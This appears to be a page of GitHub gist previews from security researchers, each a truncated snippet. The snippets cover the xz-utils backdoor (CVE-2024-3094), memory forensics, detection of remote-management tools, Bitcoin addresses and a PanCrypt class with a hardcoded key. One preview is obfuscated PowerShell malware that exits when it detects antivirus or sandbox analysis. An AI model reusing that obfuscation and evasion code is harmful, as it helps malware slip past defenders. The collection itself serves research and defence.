Dziurwa14

[
"928350122843193385",
"1185047194261274665",
"956202276408688650",
"956104664821157918",
"1185047092478095443",
"1185046791826178099",
"1185047045413797898",
"928483283698851901",
"1185047444619284641",

msuhanov

#!/usr/bin/env python3

import ctypes
import time
import threading

def test():
    def access(path):
        f = open(path, 'rb')
        __ = f.read(8192)

sgammon

There appears to be a string encoded in the binary payload:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01#file-hashes-txt-L115

Which functions as a killswitch:

https://piaille.fr/@zeno/112185928685603910

Thus, one workaround for affected systems might be to add this to `/etc/environment`:

```

thesamesam

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that

heck-gd

from __future__ import annotations

import re
from itertools import cycle

MAX_SETTINGS = 128


def load_mapping(filename: str) -> dict[int, int]:
    """Processes textual Volatility memmap output into a page mapping."""

brokensound77

Detecting RMM

The most difficult challenge with RMM detection is contextual awareness around usage to determine if it is valid or malicious.

• if the software is not used in the envrionment
  • could it be legitimate by a random empoyee?
  • is it an attacker BYOL
  • even so, all occurrences could probably be considered suspicious
• if it is used in the environment
  • is every use of it legitimate? Probably not
• this also creates significant living off the land (LOL) opportunity

cablej

15m7FP7U4kDJhAVtjjUdUB8WYswpf7Dtho
1Nm2TMEFEdyb2BP6tLyuREoKECztibuK6P
1LJYrTxrQA5pFRRg2bSyJLT6MGezmMBVfX
1EiCssanXmavzjtffYHzK6aVeQHngUxX1s
1H65AnxCg7mT4rTZmRzH8cxENk1N12rhkZ
1CVbdRQQ3TeWaPWqARKP9wvAEPvavJDrKo
1B9APV4ARm26MUW74ZcGNQE9hBHM5XGPbg
14u8xH6KdJFoTP93Lep9tpb1KQQvshQaAj
145V8AXLZpFv1ABVEsMYFsGpaZPwgKNZbf
1LGBP4iwrwv3GxybQ5QZJ19M3MAP76cw6U

LeeHolmes

$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json

$currentThread = ""
foreach($currentTweetJson in $tweets)
{
    $currentTweet = $currentTweetJson.tweet

    if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
    {

jstrosch

 $Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s');   Set  ("{1}{0}"-f'e','PdWj')  ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ;  ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"

if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast'))    {exit}
if (${SCR`IP`TP`ATh} -match "avg")      {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp'))   {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a'))  {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo'))  {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus'))    {exit}

rqu1

from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests

DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'

class PanCrypt():